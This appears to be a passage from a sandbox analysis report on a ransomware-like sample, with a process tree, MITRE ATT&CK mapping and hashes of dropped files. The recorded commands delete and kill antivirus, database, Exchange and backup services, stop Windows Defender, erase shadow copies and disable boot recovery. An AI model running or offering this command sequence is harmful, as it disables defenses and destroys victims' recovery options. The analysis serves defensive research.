- - C:\Windows\SysWOW64\sc.exe
    sc delete "hmpalertsvc"
    3⤵
    - Launches sc.exe
    PID:3240
- - C:\Windows\SysWOW64\sc.exe
    sc delete "RpcEptMapper"
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Endpoint Defense Service"
    3⤵
    - Launches sc.exe
    PID:4332
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SophosFIM"
    3⤵
    - Launches sc.exe
    PID:3876
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_filter"
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\sc.exe
    sc delete "FirebirdGuardianDefaultInstance"
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\sc.exe
    sc delete "FirebirdServerDefaultInstance"
    3⤵
    PID:3216
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLFDLauncher"
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLSERVER"
    3⤵
    PID:1128
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLSERVERAGENT"
    3⤵
    PID:2260
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLBrowser"
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLTELEMETRY"
    3⤵
    - Launches sc.exe
    PID:2236
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MsDtsServer130"
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SSISTELEMETRY130"
    3⤵
    PID:4732
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLWriter"
    3⤵
    PID:2608
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$VEEAMSQL2012"
    3⤵
    PID:392
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$VEEAMSQL2012"
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL"
    3⤵
    - Launches sc.exe
    PID:2176
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent"
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLServerADHelper100"
    3⤵
    PID:1764
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLServerOLAPService"
    3⤵
    PID:3828
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MsDtsServer100"
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ReportServer"
    3⤵
    PID:4672
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLTELEMETRY$HL"
    3⤵
    PID:3384
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMBMServer"
    3⤵
    PID:3752
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$PROGID"
    3⤵
    PID:1248
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$WOLTERSKLUWER"
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$PROGID"
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$WOLTERSKLUWER"
    3⤵
    PID:3404
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLFDLauncher$OPTIMA"
    3⤵
    - Launches sc.exe
    PID:3104
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$OPTIMA"
    3⤵
    PID:4940
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$OPTIMA"
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ReportServer$OPTIMA"
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\sc.exe
    sc delete "msftesql$SQLEXPRESS"
    3⤵
    PID:4336
- - C:\Windows\SysWOW64\sc.exe
    sc delete "postgresql-x64-9.4"
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\sc.exe
    sc delete "WRSVC"
    3⤵
    PID:4052
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ekrn"
    3⤵
    PID:4420
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ekrnEpsw"
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klim6"
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AVP18.0.0"
    3⤵
    - Launches sc.exe
    PID:2420
- - C:\Windows\SysWOW64\sc.exe
    sc delete "KLIF"
    3⤵
    PID:2068
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klpd"
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klflt"
    3⤵
    - Launches sc.exe
    PID:3652
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$MSFW
      4⤵
      PID:4664
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klbackupdisk"
    3⤵
    - Launches sc.exe
    PID:1672
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klbackupflt"
    3⤵
    - Launches sc.exe
    PID:1108
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klkbdflt"
    3⤵
    PID:4484
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klmouflt"
    3⤵
    PID:4656
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klhk"
    3⤵
    - Launches sc.exe
    PID:3020
- - C:\Windows\SysWOW64\sc.exe
    sc delete "KSDE1.0.0"
    3⤵
    - Launches sc.exe
    PID:5084
- - C:\Windows\SysWOW64\sc.exe
    sc delete "kltap"
    3⤵
    PID:4276
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ScSecSvc"
    3⤵
    - Launches sc.exe
    PID:2396
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Mail Protection"
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Scanning Server"
    3⤵
    - Launches sc.exe
    PID:4904
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Scanning ServerEx"
    3⤵
    PID:2364
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Online Protection System"
    3⤵
    PID:3396
- - C:\Windows\SysWOW64\sc.exe
    sc delete "RepairService"
    3⤵
    PID:3924
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Browsing Protection"
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Quick Update Service"
    3⤵
    PID:936
- - C:\Windows\SysWOW64\sc.exe
    sc delete "McAfeeFramework"
    3⤵
    PID:3412
- - C:\Windows\SysWOW64\sc.exe
    sc delete "macmnsvc"
    3⤵
    - Launches sc.exe
    PID:3092
- - C:\Windows\SysWOW64\sc.exe
    sc delete "masvc"
    3⤵
    PID:2996
- - C:\Windows\SysWOW64\sc.exe
    sc delete "mfemms"
    3⤵
    - Launches sc.exe
    PID:4644
- - C:\Windows\SysWOW64\sc.exe
    sc delete "mfevtp"
    3⤵
    PID:844
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmFilter"
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\sc.exe
    sc delete "tmusa"
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMLWCSService"
    3⤵
    - Launches sc.exe
    PID:3980
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmPreFilter"
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMSmartRelayService"
    3⤵
    - Launches sc.exe
    PID:916
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMiCRCScanService"
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\sc.exe
    sc delete "VSApiNt"
    3⤵
    PID:4192
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmCCSF"
    3⤵
    PID:3964
- - C:\Windows\SysWOW64\sc.exe
    sc delete "tmlisten"
    3⤵
    PID:4272
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmProxy"
    3⤵
    - Launches sc.exe
    PID:2176
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ntrtscan"
    3⤵
    PID:752
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ofcservice"
    3⤵
    PID:4676
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmPfw"
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PccNTUpd"
    3⤵
    - Launches sc.exe
    PID:4336
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PandaAetherAgent"
    3⤵
    PID:4848
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PSUAService"
    3⤵
    - Launches sc.exe
    PID:4740
- - C:\Windows\SysWOW64\sc.exe
    sc delete "NanoServiceMain"
    3⤵
    PID:4652
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPIntegrationService"
    3⤵
    PID:3764
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPProtectedService"
    3⤵
    - Launches sc.exe
    PID:3036
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPRedline"
    3⤵
    PID:1580
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPSecurityService"
    3⤵
    PID:1376
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPUpdateService"
    3⤵
    - Launches sc.exe
    PID:4572
- - C:\Windows\SysWOW64\sc.exe
    sc delete "UniFi"
    3⤵
    PID:5060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im PccNTMon.exe
    3⤵
    - Kills process with taskkill
    PID:3196
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im NTRtScan.exe
    3⤵
    - Kills process with taskkill
    PID:1212
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmListen.exe
    3⤵
    - Kills process with taskkill
    PID:3120
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmCCSF.exe
    3⤵
    - Kills process with taskkill
    PID:3244
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmProxy.exe
    3⤵
    - Kills process with taskkill
    PID:1940
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TMBMSRV.exe
    3⤵
    - Kills process with taskkill
    PID:1928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TMBMSRV.exe
    3⤵
    - Kills process with taskkill
    PID:2976
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmPfw.exe
    3⤵
    - Kills process with taskkill
    PID:3528
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im CNTAoSMgr.exe
    3⤵
    - Kills process with taskkill
    PID:4932
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlbrowser.exe
    3⤵
    - Kills process with taskkill
    PID:2948
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlwriter.exe
    3⤵
    - Kills process with taskkill
    PID:4564
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlservr.exe
    3⤵
    - Kills process with taskkill
    PID:3016
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im msmdsrv.exe
    3⤵
    - Kills process with taskkill
    PID:3040
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im MsDtsSrvr.exe
    3⤵
    - Kills process with taskkill
    PID:2912
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlceip.exe
    3⤵
    - Kills process with taskkill
    PID:1520
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdlauncher.exe
    3⤵
    - Kills process with taskkill
    PID:4836
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im Ssms.exe
    3⤵
    - Kills process with taskkill
    PID:4884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im SQLAGENT.EXE
    3⤵
    - Kills process with taskkill
    PID:4896
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdhost.exe
    3⤵
    - Kills process with taskkill
    PID:4008
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdlauncher.exe
    3⤵
    - Kills process with taskkill
    PID:5032
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlservr.exe
    3⤵
    - Kills process with taskkill
    PID:2772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im ReportingServicesService.exe
    3⤵
    - Kills process with taskkill
    PID:4976
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im msftesql.exe
    3⤵
    - Kills process with taskkill
    PID:2208
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im pg_ctl.exe
    3⤵
    - Kills process with taskkill
    PID:3216
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im postgres.exe
    3⤵
    - Kills process with taskkill
    PID:4992
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper100
    3⤵
    PID:3120
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100
      4⤵
      PID:3832
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$ISARS
    3⤵
    PID:1940
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ISARS
      4⤵
      PID:2148
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$MSFW
    3⤵
    PID:1180
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$MSFW
      4⤵
      PID:4816
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$ISARS
    3⤵
    PID:1944
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ISARS
      4⤵
      PID:2360
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$MSFW
    3⤵
    PID:3652
- - C:\Windows\SysWOW64\net.exe
    net stop SQLBrowser
    3⤵
    PID:1212
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser
      4⤵
      PID:2032
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$ISARS
    3⤵
    PID:3900
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$ISARS
      4⤵
      PID:1736
- - C:\Windows\SysWOW64\net.exe
    net stop SQLWriter
    3⤵
    PID:3832
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLWriter
      4⤵
      PID:2296
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:4344
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:1428
- - C:\Windows\SysWOW64\net.exe
    net stop mr2kserv
    3⤵
    PID:1384
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mr2kserv
      4⤵
      PID:4904
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeADTopology
    3⤵
    PID:1656
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeADTopology
      4⤵
      PID:1096
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeFBA
    3⤵
    PID:2980
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeFBA
      4⤵
      PID:1576
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeIS
    3⤵
    PID:540
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS
      4⤵
      PID:2700
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeSA
    3⤵
    PID:3376
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA
      4⤵
      PID:2072
- - C:\Windows\SysWOW64\net.exe
    net stop ShadowProtectSvc
    3⤵
    PID:2528
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ShadowProtectSvc
      4⤵
      PID:3108
- - C:\Windows\SysWOW64\net.exe
    net stop SPAdminV4
    3⤵
    PID:4120
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPAdminV4
      4⤵
      PID:1796
- - C:\Windows\SysWOW64\net.exe
    net stop SPTimerV4
    3⤵
    PID:4512
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPTimerV4
      4⤵
      PID:1652
- - C:\Windows\SysWOW64\net.exe
    net stop SPTraceV4
    3⤵
    PID:4192
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPTraceV4
      4⤵
      PID:2496
- - C:\Windows\SysWOW64\net.exe
    net stop SPUserCodeV4
    3⤵
    PID:4648
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPUserCodeV4
      4⤵
      PID:3104
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop firebirdguardiandefaultinstance
      4⤵
      PID:3544
- - C:\Windows\SysWOW64\net.exe
    net stop SPWriterV4
    3⤵
    PID:1428
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPWriterV4
      4⤵
      PID:4364
- - C:\Windows\SysWOW64\net.exe
    net stop SPSearch4
    3⤵
    PID:3960
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPSearch4
      4⤵
      PID:2184
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper100
    3⤵
    PID:4936
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100
      4⤵
      PID:1096
- - C:\Windows\SysWOW64\net.exe
    net stop IISADMIN
    3⤵
    PID:2300
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IISADMIN
      4⤵
      PID:3016
- - C:\Windows\SysWOW64\net.exe
    net stop firebirdguardiandefaultinstance
    3⤵
    PID:4648
- - C:\Windows\SysWOW64\net.exe
    net stop ibmiasrw
    3⤵
    PID:4348
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ibmiasrw
      4⤵
      PID:4368
- - C:\Windows\SysWOW64\net.exe
    net stop QBCFMonitorService
    3⤵
    PID:2396
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBCFMonitorService
      4⤵
      PID:2032
- - C:\Windows\SysWOW64\net.exe
    net stop QBVSS
    3⤵
    PID:2340
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBVSS
      4⤵
      PID:4848
- - C:\Windows\SysWOW64\net.exe
    net stop QBPOSDBServiceV12
    3⤵
    PID:2920
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBPOSDBServiceV12
      4⤵
      PID:4872
- - C:\Windows\SysWOW64\net.exe
    net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
    3⤵
    PID:4716
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)"
      4⤵
      PID:8
- - C:\Windows\SysWOW64\net.exe
    net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
    3⤵
    PID:5088
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
      4⤵
      PID:1672
- - C:\Windows\SysWOW64\net.exe
    net stop IISADMIN
    3⤵
    PID:3816
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IISADMIN
      4⤵
      PID:2608
- - C:\Windows\SysWOW64\net.exe
    net stop "Simply Accounting Database Connection Manager"
    3⤵
    PID:4356
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager"
      4⤵
      PID:1424
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB1
    3⤵
    PID:2396
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB1
      4⤵
      PID:3496
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB2
    3⤵
    PID:5072
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB2
      4⤵
      PID:1052
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB3
    3⤵
    PID:3764
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB3
      4⤵
      PID:1808
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB4
    3⤵
    PID:3104
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB4
      4⤵
      PID:3036
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB5
    3⤵
    PID:4288
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB5
      4⤵
      PID:4344
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq MsMpEng.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:3952
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:5088
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq ntrtscan.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:4356
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq avp.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:1652
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:2208
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq WRSA.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:5072
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq egui.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:844
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:3632
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq AvastUI.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:2584
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:3656
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
  2⤵
  PID:2692
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  PID:852
- C:\Windows\SysWOW64\notepad.exe
  notepad.exe
  2⤵
  - Deletes itself
  PID:1972

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4752

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2576

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv 7Rn+mt8r30isfuUCONurxA.0.1
1⤵
PID:2056

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:1656

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb.png

Filesize
64KB

MD5
bbb91b9f6497a70978de14b72e476743

SHA1
a5faf85abb9d18a9f8f2038add6146c591997d23

SHA256
7a421fa9b745f48a6c6e889da0265c640b9c8308f24f2659ad774d0788c5914d

SHA512
592d5a150175449f1f8756316d5b9480b8e4fcfdaf2cbf9ce4c5d600d68bc260b1fb6816363e5e7c8b997cd822f2ae19fdaf2f29936ff40f7fef5c4861a797e9

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_bow.png

Filesize
52KB

MD5
8d4e34b672c21ca0a93f2530e8496232

SHA1
223ec36e1c8e1d57b3241cffb6d6f5e6763180f9

SHA256
6a1c053730ae6d0972ca1401dd0630079ceeab245b256591b079abe064c24a7b

SHA512
12b698ff117bb49effb73b8aba75640d41cf67d49c7a905449e9cc0eb7e643dd89b3c106cb18a415d1f3d9378eb9cd047b4538632cf5240c647afd97cd589e47

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_wob.png

Filesize
52KB

MD5
d7ab1fabee09d05d367b0b25a44dc47b

SHA1
f92beb7db97e7b995dc2a4976c1a78b337ed9eb7

SHA256
d19f2f8878b9dd9b308b3ecd8eb5407064649d0373e0d596c62d11b5a40caa82

SHA512
b8e2d9927d46e39e6c9840f373556ecdac57df60d796de6eb7a8cf5ab1b5d56d0c2a1cfc52eab75b4ace2852bd20b6392432b59ae0ebc4e3c94108ad22963d2b

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons_retina_thumb.png

Filesize
52KB

MD5
31119a417b063b289d6bf39398a035b6

SHA1
af38ec945b19a9e9eaf9a981d1d045610d46c5ce

SHA256
ed4df38677d871f9dc05596c7825680690e22fd77d70861b203d9c13ed44a828

SHA512
edd8503d28075e09610fe8f39e0a6a75d9a023273855a8b69763e2c0a62b807b2f0d11adabab40c41879818df3b5e15365376311e99872ee1ff77ed2078609dd

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\ui-strings.js

Filesize
29KB

MD5
87752e48bd625ae3a05be0a5be3b0b9c

SHA1
826cc05553d299a8b071dfd161d9f49d068caae3

SHA256
a159e6486935c461e94d5a534b30239ae18f6dfb79b6d48550ebcdfc7f593e5c

SHA512
6274ced3c4b03e6ce43bf1a15a709288ac004841cfb88e02ca0f84ad7fa6ef80fbb7c60386a6cba9d27ddc69677863dd9bc3c01aebb64ffc76d0da2efb93c89b

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\ui-strings.js

Filesize
34KB

MD5
4d91da1cd3369d13d006db76dc687b39

SHA1
6120b62ed2a5bd5749c621d8037453e13aaed65b

SHA256
94e0a51bf42995ca0f2159351e918c899fe81671d0cecb1d04f1381c0bee3f38

SHA512
cbcb4ccf7d3e76e478a0605ce3462d9a154af928f2ba9af808e5a12a7de74025616a8fa586e81eb31b8e6b96555810ca99863eb240c997a2a459dcbfbc621468

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\ui-strings.js

Filesize
9KB

MD5
e659923efbb294419a8f84cbfddb6290

SHA1
6fa88baf62ee20ae4f313999107e86de2b67668f

SHA256
c6e055fb2c060c255191466b3552d04beda737309c25b527c6ae3eae0613596f

SHA512
8e7816a00e75171510c4b565390281777a46cb26398c88513b5b0ed4984a4949b52cf1e21a082d2a91db7c8bc0544620ae439dd68e8dd1b3556655fa8bb15c70

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\ui-strings.js

Filesize
10KB

MD5
e79453229b9bfae901accf5624bd28d7

SHA1
d81a11696b96d8e843f0da069738bcf82bba10be

SHA256
9fd6bce8d5801184697d6b1241e5a22bba4529214652aa8d6ca3a4829a8c5745

SHA512
f30b85ba2fc95f30bf05fb0446c2870bbca50ca56af06de88f659faf9af528ee08d0336817c264fe6b7e43b6302ab49f48cadbefbfc10e7a9923b8e103387ed5

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\ui-strings.js

Filesize
5KB

MD5
eaf97d91465c7bacabc688a86f4d5939

SHA1
e5d775a0fc08729a20d549ef505bdc960d3847f4

SHA256
f06e84a6ac9523bc91ad9227e9fbdee4d0c961b95050dbec473546d85e4d9502

SHA512
df35cb7beb11b0d8d466b74f83aebfcc7169e0319f28af3d3b48522ba2067f5a28a50af5166c1743705ebc5c716e6a59043cc8a29c54374d07b19a455525c367

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\ui-strings.js

Filesize
6KB

MD5
6ef894b8b4751ff2476f57a609c9d5fc

SHA1
818b57d7d9302d47d32370c23ee62e4577c0544a

SHA256
4f265e1e423a4822c0807ece3233cb976c04c3df157c1c9a83f5c385990e650f

SHA512
dc1ea27976d0bae511ed6d1b400819a3865bdfc27d31a85e077791f90bbc845d1f17fd57b84ea9ad9eeeac699a48427fc9bb366e9c225cc14f61e10f31a2de4d

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png

Filesize
9KB

MD5
6d68fea560e1829f6e54ff9d8cd90aae

SHA1
10976e7aabed9c405867092d3f2f2bab04073622

SHA256
4140b2cbd6b7b5dd362888b7fc676c5c0714dbdddd6954fe0c3181788bbc0f6d

SHA512
